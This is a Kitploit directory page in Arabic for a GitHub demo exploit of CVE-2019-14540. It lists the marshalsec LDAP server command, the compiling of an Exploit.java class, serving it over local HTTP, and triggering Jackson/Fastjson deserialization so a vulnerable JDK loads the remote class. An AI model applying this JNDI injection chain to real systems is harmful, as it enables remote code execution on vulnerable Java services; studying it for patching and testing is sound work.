Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-14540-exploit — CVE-2019-14540 استغلال | Kitploit
أدوات/GitHubGitHub/leadroyal/cve-2019-14540-exploit
التحليل الديناميكي (عزل)توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubleadroyal/cve-2019-14540-exploit

cve-2019-14540-exploit

CVE-2019-14540 استغلال

عرض المستودع
2195منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2019-14540

http://www.leadroyal.cn/?p=939

القيود البيئية: نظرًا لأن هذا العرض التوضيحي يستخدم أسلوب استغلال JNDI عبر LDAP، فيجب استخدام إصدار منخفض من JDK (أقل من 8u191).

1. استخدام marshalsec لإنشاء خدمة LDAP على المنفذ المحلي 1389، تشير إلى خدمة HTTP المحلية على المنفذ 8000

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389

2. تجميع الكود المطلوب تحميله عن بُعد في مجلد remote_codebase

root@kitploit:~
cd remote_codebase
javac Exploit.java

3. تشغيل خدمة HTTP على المنفذ المحلي 8000 من مجلد remote_codebase

root@kitploit:~
cd remote_codebase
python -m SimpleHTTPServer

4. تشغيل Main.java لتحفيز الثغرة باستخدام إلغاء تسلسل Jackson و Fastjson

demo.png

تنزيل الأداة